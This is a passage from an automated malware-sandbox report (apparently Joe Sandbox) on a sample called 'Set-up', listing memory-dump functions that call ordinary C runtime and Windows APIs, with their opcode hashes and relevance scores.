_errno.MSVCR100 ref: 6BB6E30C
_errno.MSVCR100 ref: 6BB6E316
_errno.MSVCR100 ref: 6BB8B8E6

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 2e2c6133e67dc508463d10d431fac4f051eb4a40ca8b912ec9ca342d6b22e40f
Instruction ID: 7f684222dbfae81eba4b1cb8f670e16ca43a45a3200a24b71015ef44e3ebd298
Opcode Fuzzy Hash: 2e2c6133e67dc508463d10d431fac4f051eb4a40ca8b912ec9ca342d6b22e40f
Instruction Fuzzy Hash: 50017C305247849FD7255F7AD88176C7BA5EF4A3A9F00029AD5604B290FB7CAC40DFA1

Function 6BB60110 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy.MSVCR100(?,00000000,?), ref: 6BB60141
_errno.MSVCR100 ref: 6BB895AD
_invalid_parameter_noinfo.MSVCR100 ref: 6BB895B7
_memset.LIBCMT(?,00000000,?), ref: 6BB895CB
_errno.MSVCR100 ref: 6BB895DE

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_memsetmemcpy
String ID:
API String ID: 2314827996-0
Opcode ID: 24d3509d602729fcf9db17f7d46f62d11e562c21541381a8313e25e63287101c
Instruction ID: cc1fc1346506d8195522227874054f37bc982012e2b89ff29c20c84ddf3e706c
Opcode Fuzzy Hash: 24d3509d602729fcf9db17f7d46f62d11e562c21541381a8313e25e63287101c
Instruction Fuzzy Hash: 31016232544398FBCF225E25EC497DD3754EF04B58F004466F9185A191E77D8990CF92

Function 6BB716B5 Relevance: 7.5, APIs: 5, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_get_osfhandle.MSVCR100(00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716BF
SetFilePointer.KERNEL32(00000000,?,00000000,6BB6D354,00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716D8
_errno.MSVCR100(?,?,6BB6D354,?,00000000,00000000), ref: 6BB9036B
GetLastError.KERNEL32(?,6BB6D354,?,00000000,00000000), ref: 6BB9037E
__dosmaperr.LIBCMT(00000000,?,6BB6D354,?,00000000,00000000), ref: 6BB9038A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr_errno_get_osfhandle
String ID:
API String ID: 1165083932-0
Opcode ID: 33dcf94ecdac0297e5285af4e35841444468cbad5cdb5abf51d492403e7a9367
Instruction ID: 095d67b44f6ec6c499cfb4460ef393b66c747897a12e39a81f820ada9a0d94f1
Opcode Fuzzy Hash: 33dcf94ecdac0297e5285af4e35841444468cbad5cdb5abf51d492403e7a9367
Instruction Fuzzy Hash: ED01F433214AA4AFCB116EBC9C04A4E3769EF87775B190761F534DB1E0EB38C8018BA4

Function 6BB63798 Relevance: 7.5, APIs: 5, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100(?,6BB62D92,?,?,?,00000000,?), ref: 6BB893B8
_invalid_parameter_noinfo.MSVCR100(?,6BB62D92,?,?,?,00000000,?), ref: 6BB893C3
_errno.MSVCR100(?,?,6BB62D92,?,?,?,00000000,?), ref: 6BB893CD
_errno.MSVCR100 ref: 6BB893E4
_invalid_parameter_noinfo.MSVCR100(?,?,6BB62D92,?,?,?,00000000,?), ref: 6BB893EF

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 4b4d150b7e77dca16d8177f797b708a718b730cf281ba2991a1ce8cb57af46de
Instruction ID: d1afccd6fd09b0398122b856e05c46c19ae9ee54247b65c11acd4719bfb0ab63
Opcode Fuzzy Hash: 4b4d150b7e77dca16d8177f797b708a718b730cf281ba2991a1ce8cb57af46de
Instruction Fuzzy Hash: F3018131401699EBCF111FB8DC01BAE3B54AF41778F001645F938466E1EBBD8860CFA5

Function 6BB6E651 Relevance: 7.5, APIs: 5, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB8927E
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89289
_errno.MSVCR100 ref: 6BB89293
_errno.MSVCR100 ref: 6BB892A8
_invalid_parameter_noinfo.MSVCR100 ref: 6BB892B3

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 7bbae7128125840f7d256313ad025255df6e0a456f57df3873bbbcdee5d89585
Instruction ID: 9349596d34d553e20e16fa38d94479e6779144dd21304bc08c30139a820ae77f
Opcode Fuzzy Hash: 7bbae7128125840f7d256313ad025255df6e0a456f57df3873bbbcdee5d89585
Instruction Fuzzy Hash: 75018631840A99EADF111EB4DC01B9E3B549F42774F000645E9684D1E1E77D8860CFE1

Function 6BB72F0F Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock_file.MSVCR100(?,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB72F3E

Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584

_fread_nolock_s.MSVCR100(?,?,?,?,?,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB72F56

Part of subcall function 6BB72E42: memcpy_s.MSVCR100(?,?,?,?), ref: 6BB72EEB

Part of subcall function 6BB72A86: _unlock_file.MSVCR100(6BB72F6D,6BB72F6D), ref: 6BB72A89

_memset.LIBCMT(?,00000000,000000FF,6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D02
_errno.MSVCR100(6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D0A
_invalid_parameter_noinfo.MSVCR100(6BB72F78,0000000C,6BB72FAC,?,000000FF,?,?,?), ref: 6BB88D15

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_memset_unlock_filememcpy_s
String ID:
API String ID: 3226975504-0
Opcode ID: 432785bd880cb237c7a6b95025af9ac7594f3927a3424da0a191a2b9eeaef6dc
Instruction ID: 3a04ea8f0085df6df0f59a39f7759bc8fed85355e7aff9043e1d3d3c80d70786
Opcode Fuzzy Hash: 432785bd880cb237c7a6b95025af9ac7594f3927a3424da0a191a2b9eeaef6dc
Instruction Fuzzy Hash: E2015A7180129AEBCF21AFB5CC0249E3B20EF05794F408129F834151A0E7398AA1DFD1

Function 6BB6CA4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_control87.MSVCR100(00000001,?,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB6CA7D
_control87.MSVCR100(00000000,00000000,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924BB
_errno.MSVCR100(00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924C4
_invalid_parameter_noinfo.MSVCR100(00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924CE
_control87.MSVCR100(00000001,?,00000000,?,6BBACE9B,00000000,00010000,00030000,?,6BB91D56,?,6BB6B983,?,?,6BB6B295,00000000), ref: 6BB924DA

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _control87$_errno_invalid_parameter_noinfo
String ID:
API String ID: 1498936549-0
Opcode ID: bf4e1a7da49c6d64d966f304bc058d75b43548e15341f806baddd6ebdcd0a6cc
Instruction ID: b4e18360e8ce0f520ee6a2d14d85c97142c46e416dae16e6e61fa73abdbe28de
Opcode Fuzzy Hash: bf4e1a7da49c6d64d966f304bc058d75b43548e15341f806baddd6ebdcd0a6cc
Instruction Fuzzy Hash: 09F09032A587A46BDB256E78A802BAD3394DF05BA0F104429FE54DB380EB789C009698

Function 6BB6A745 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB6A780
__doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90417
_errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9041F
_errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90432
_invalid_parameter_noinfo.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9043D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2315031519-0
Opcode ID: eaf6e39f7c8dc328b81591f8cbbbd7bce3a88871f574d5af43e5ff42c8fd5bd3
Instruction ID: 45f27c94a9463f2850e7896965f82793c1dc3f4602fd01be09155f744094bfc0
Opcode Fuzzy Hash: eaf6e39f7c8dc328b81591f8cbbbd7bce3a88871f574d5af43e5ff42c8fd5bd3
Instruction Fuzzy Hash: 19F09A312442848BDB1A9FB8D441B3877B09F833A9F5102A9D5288B6D1EBBCDC428E91

Function 6BBA007C Relevance: 7.5, APIs: 5, Instructions: 32memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BB9B834: __EH_prolog3.LIBCMT ref: 6BB9B83B

TlsAlloc.KERNEL32 ref: 6BBA009D
GetLastError.KERNEL32 ref: 6BBA00AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA00C6
_CxxThrowException.MSVCR100(00000000,6BBFFEB4,00000000), ref: 6BBA00D5
Concurrency::details::UMSThreadScheduler::OneShotStaticConstruction.LIBCMT ref: 6BBA00DA

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: AllocConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConstructionErrorExceptionH_prolog3LastScheduler::ShotStaticThreadThrow
String ID:
API String ID: 3767078539-0
Opcode ID: 2f1bd6bf4f2a92aaa44e163997a43d1a6f1d6f4dc27c751f59a5e15f2511c8c6
Instruction ID: 8697f152852e4e6aca1a01109662287cf8eacb5595dbd2ef55576a18304f49a7
Opcode Fuzzy Hash: 2f1bd6bf4f2a92aaa44e163997a43d1a6f1d6f4dc27c751f59a5e15f2511c8c6
Instruction Fuzzy Hash: 5BF0E2328152814ACB206EB0880766E3798EB42324F184779E475C20C0EB3DC5049A62

Function 6BB5442D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6BB544BD

Part of subcall function 6BB78900: __87except.LIBCMT ref: 6BB7893B

Strings

pow, xrefs: 6BB54495, 6BB544B2

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 09d655443bcf6f0e771496def2a717ec8cf49ebb38911fa5d99ba9d26c45b6e5
Instruction ID: f7af7bb49e7bd29d29f96f9688c95d6b191ed68634d590df990fbec8383ed75b
Opcode Fuzzy Hash: 09d655443bcf6f0e771496def2a717ec8cf49ebb38911fa5d99ba9d26c45b6e5
Instruction Fuzzy Hash: 8851E473E4C1C297D7016E28D95236E3BE8EB42B54F104D99E4E58229CEF3DC8B58A47

Function 6BB6DAD9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB8EF68
DName::operator+.LIBCMT ref: 6BB8EF6F

Part of subcall function 6BB6E04B: DName::DName.LIBCMT ref: 6BB6E102
Part of subcall function 6BB6E04B: DName::operator+.LIBCMT ref: 6BB6E109

Strings

CV: , xrefs: 6BB8EF60

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::Name::operator+
String ID: CV:
API String ID: 2649573449-3725821052
Opcode ID: 0b0856d6ba99736b97e4d0edd67a12a00f1aa2ba8e9f7eb993b46b9b9b383304
Instruction ID: b5bf1c3037238d93c2a27c1c5c31bfc1f0875fc593b215e44cd7e37cca61645a
Opcode Fuzzy Hash: 0b0856d6ba99736b97e4d0edd67a12a00f1aa2ba8e9f7eb993b46b9b9b383304
Instruction Fuzzy Hash: 52410131A442C59FDF00DF68E841AAF7BF9EF16345F2A4199D462CB294EB38D942CB00

Function 6BB64202 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcslen.LIBCMT(?), ref: 6BB6422C
_errno.MSVCR100 ref: 6BB88FDB
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88FE6

Strings

I, xrefs: 6BB64232

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_wcslen
String ID: I
API String ID: 3151729805-3707901625
Opcode ID: a946e649708c495ba3de64228eefbbd13c8b602ca7283c3ef24064f5e4a28dd5
Instruction ID: b12129bf6b66e052067ce4a834855f661a04fb20fee707717901c4a31a504663
Opcode Fuzzy Hash: a946e649708c495ba3de64228eefbbd13c8b602ca7283c3ef24064f5e4a28dd5
Instruction Fuzzy Hash: 59014F72C00699ABDF008FA5DC01AAE7BB5AF44768F104A15E534A61D0E77D86128FA9

Function 6BB70A05 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6BB70A2F
_errno.MSVCR100 ref: 6BB88F41
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88F4C

Strings

I, xrefs: 6BB70A3A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_strlen
String ID: I
API String ID: 1245117036-3707901625
Opcode ID: 104c0a01e2b9b4bfe5cf8e790197371b81950b518ee4aa113952663ec273a45e
Instruction ID: 6baa25d81535279bbda02c5b8613f99e69ab0be3902ed2da7d106ce15cdaf3d2
Opcode Fuzzy Hash: 104c0a01e2b9b4bfe5cf8e790197371b81950b518ee4aa113952663ec273a45e
Instruction Fuzzy Hash: 0B018F71C0025AABDF009FA5C801AEE7BB5FF44728F10461AF524A6280D779C511CFA9

Function 6BB646C1 Relevance: 6.3, APIs: 4, Instructions: 262COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB913EC
_invalid_parameter_noinfo.MSVCR100 ref: 6BB913F7
_errno.MSVCR100 ref: 6BB91402
_invalid_parameter_noinfo.MSVCR100 ref: 6BB9140D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: 0f7806659183300477434c852ae5586eb72dadc6bc092987c5a806937287d50d
Instruction ID: 76c25a9611c6130a795b7430897c9e137f704757dc27385bcd252bff13386079
Opcode Fuzzy Hash: 0f7806659183300477434c852ae5586eb72dadc6bc092987c5a806937287d50d
Instruction Fuzzy Hash: B9914A35A08AE99BCF058F6898A01EE7B75EF9B385F144099EC5497344F738DD10CBA1

Function 6BB6B73E Relevance: 6.2, APIs: 4, Instructions: 160COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6BB6B7A7
GetCPInfo.KERNEL32(00000000,?), ref: 6BB6B7BA
_memset.LIBCMT(0000001D,00000000,00000101), ref: 6BB6B7D2
_memset.LIBCMT(0000001D,00000000,00000101,00000000,?,00000000), ref: 6BB8A8ED

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _memset$CodeInfoPageValid
String ID:
API String ID: 1608968462-0
Opcode ID: 2319d32c55e428a8e9f8638d4f2f01369ca0a7b325b088f2eba3d0857061ee01
Instruction ID: c8f1e2e57777fa3399a59d9bc4b7aeccdd0029c2f19e78d0e8f565ec1bc35501
Opcode Fuzzy Hash: 2319d32c55e428a8e9f8638d4f2f01369ca0a7b325b088f2eba3d0857061ee01
Instruction Fuzzy Hash: 475101319042958BDF259F69C8812BEBBB0EF45704F0984AAD8A59B282D77DC942CF90

Function 6BB98F20 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,6BBA0AF2), ref: 6BB98FFA
_memset.LIBCMT(00000000,00000000,?,00000000,6BBA0AF2), ref: 6BB9900D
??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,6BBA0AF2), ref: 6BB99014
?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,6BBA0AF2), ref: 6BB9905F

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
String ID:
API String ID: 4058414921-0
Opcode ID: 15b3ec688518d8b3ee56ca794fcd6c548ef263227db7ef19d203841218a4e1f8
Instruction ID: f1eaf242421b828c7daa3172c6731d421c6e8e8f5d752ee8c0cee44aac1de02e
Opcode Fuzzy Hash: 15b3ec688518d8b3ee56ca794fcd6c548ef263227db7ef19d203841218a4e1f8
Instruction Fuzzy Hash: 75517F30508341CFE715DF28D981B1AB7E0FF86364F108A6DE5AA8B695E734E845CB92

Function 6BB73D0D Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_mbsdec.MSVCR100(?,?), ref: 6BB73D7C
_errno.MSVCR100 ref: 6BB90E88
_invalid_parameter_noinfo.MSVCR100 ref: 6BB90E94
_errno.MSVCR100 ref: 6BB90EC3

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo_mbsdec
String ID:
API String ID: 1897159254-0
Opcode ID: bb98a4fb3c80387d61b3b9e727aeadf2b3f5ed3c393aab7b1b2afe272cafeaf5
Instruction ID: 252e66e57073e07402c216005aac6a46a3a493f0b5d54c9f54a31af38cbdd0eb
Opcode Fuzzy Hash: bb98a4fb3c80387d61b3b9e727aeadf2b3f5ed3c393aab7b1b2afe272cafeaf5
Instruction Fuzzy Hash: 7531E532A4C2C49FD732AF2894906AD7BA1DB47750B6544F8E8F14F311D2389C8797A1

Function 6BB96CDB Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6BB96DB6
_memset.LIBCMT(00000000,00000000,?,00000000,00000000), ref: 6BB96DC9
??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6BB96DD0
?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6BB96E1B

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
